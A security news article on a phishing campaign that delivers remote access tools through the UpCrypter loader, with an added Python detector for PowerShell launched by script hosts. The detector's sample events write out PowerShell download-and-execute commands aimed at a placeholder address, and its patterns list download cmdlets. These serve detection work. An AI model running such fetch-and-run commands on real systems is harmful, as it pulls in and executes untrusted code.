Global Phishing Campaign Uses UpCrypter to Deploy Remote Access Tools

A large-scale phishing operation has been uncovered by cybersecurity researchers, leveraging highly personalized emails and spoofed websites to trick victims into downloading malicious files.

According to a recent advisory from FortiGuard Labs, attackers are using a custom loader known as UpCrypter to deliver a variety of remote access tools (RATs), enabling persistent control over compromised systems.

How the Attack Unfolds

The campaign typically begins with phishing emails containing HTML attachments. When opened, these files redirect victims to fraudulent websites designed to appear legitimate. To strengthen credibility, the sites embed the recipient’s email address and in some cases display the company logo of the target organization.

Researchers have observed different lures being used, such as:

  • Voicemail scams – Emails claiming the user missed a call, with an HTML file that silently redirects the browser to a phishing site.
  • Purchase order fraud – Spoofed purchase requests in Chinese, with an attachment that builds a malicious URL leading to a counterfeit page.

Once redirected, victims are encouraged to download a ZIP archive containing an obfuscated JavaScript file. This script executes PowerShell commands, bypasses detection mechanisms, and retrieves additional payloads from attacker-controlled servers.

In some variants, steganography is employed, hiding data inside image files to evade security scans.

UpCrypter as the Core Delivery Mechanism

At the center of this campaign is UpCrypter, a loader actively maintained by its developer and even showcased on YouTube. Before execution, UpCrypter checks for forensic tools, virtual machines, or sandbox environments.

  • If signs of analysis are detected, it forces a system reboot to disrupt investigations.
  • Once validated, it downloads and runs additional components in memory while establishing persistence through registry modifications.

The final payloads identified so far include PureHVNC, DCRat, and Babylon RAT. These tools allow attackers to perform keylogging, credential theft, file exfiltration, and full remote control of infected systems.

Rapid Expansion Across Industries

FortiGuard Labs reported that detections of this campaign doubled within just two weeks, highlighting its rapid global spread. Targeted industries include manufacturing, technology, healthcare, construction, and retail/hospitality.

Unlike traditional phishing schemes aimed at stealing login credentials, this campaign demonstrates a multi-stage intrusion chain designed to implant sophisticated malware inside corporate networks.

Mitigation Recommendations

Researchers stress that organizations must take this threat seriously by implementing:

  • Robust email filtering
  • Network-level monitoring for PowerShell abuse
  • User awareness training to help staff recognize and avoid phishing attempts
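A concrete form of the "monitoring for PowerShell abuse" recommendation, added here as an example and not taken from the advisory or the article: the script below checks process-creation events for the stage in which the dropped JavaScript launches PowerShell to fetch a payload. The sample events, paths, command lines and the 203.0.113.5 address are constructed for the example and are not indicators from the campaign.

```python
import base64
import re

# Constructed process-creation events (the shape of Sysmon Event ID 1 / EDR telemetry).
# The encoded command is built here so the sample decodes to a known download one-liner.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/s')".encode("utf-16le")
).decode()
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\wscript.exe",            # script host running a .js file
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -NoP -W Hidden -EncodedCommand {_ENCODED}"},
    {"parent": r"C:\Windows\explorer.exe",                     # benign admin script
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"parent": r"C:\Windows\System32\cscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -ep Bypass -c \"Invoke-WebRequest http://203.0.113.5/img.jpg -OutFile $env:TEMP\\a.jpg\""},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}   # what runs the obfuscated .js from the ZIP
POWERSHELL = {"powershell.exe", "pwsh.exe"}
DOWNLOAD_RE = re.compile(r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Net\.WebClient|Start-BitsTransfer", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
ENCODED_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def indicators(event):
    """Reasons a PowerShell launch resembles the JS -> PowerShell -> download stage."""
    if event["image"].rsplit("\\", 1)[-1].lower() not in POWERSHELL:
        return []
    reasons = []
    if event["parent"].rsplit("\\", 1)[-1].lower() in SCRIPT_HOSTS:
        reasons.append("spawned by Windows script host")
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        reasons.append("encoded command")
    text = event["cmdline"] + (decoded or "")   # inspect the decoded script as well
    if HIDDEN_RE.search(text):
        reasons.append("hidden window")
    if DOWNLOAD_RE.search(text):
        reasons.append("downloads a remote payload")
    return reasons

def find_suspicious(events, threshold=2):
    """Return (index, reasons) for events that show at least `threshold` indicators."""
    return [(i, r) for i, e in enumerate(events) if len(r := indicators(e)) >= threshold]
```

Requiring two indicators keeps a lone `-File` launch from an interactive shell out of the alert queue while still catching a script host that spawns a hidden or encoded downloader.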

As Fortinet concluded:

“This is not a simple credential-harvesting campaign, but a complex attack delivering advanced malware. Organizations should adopt layered defenses to minimize risk.”

Source: https://www.infosecurity-magazine.com/news/phishing-upcrypter-deploy-rat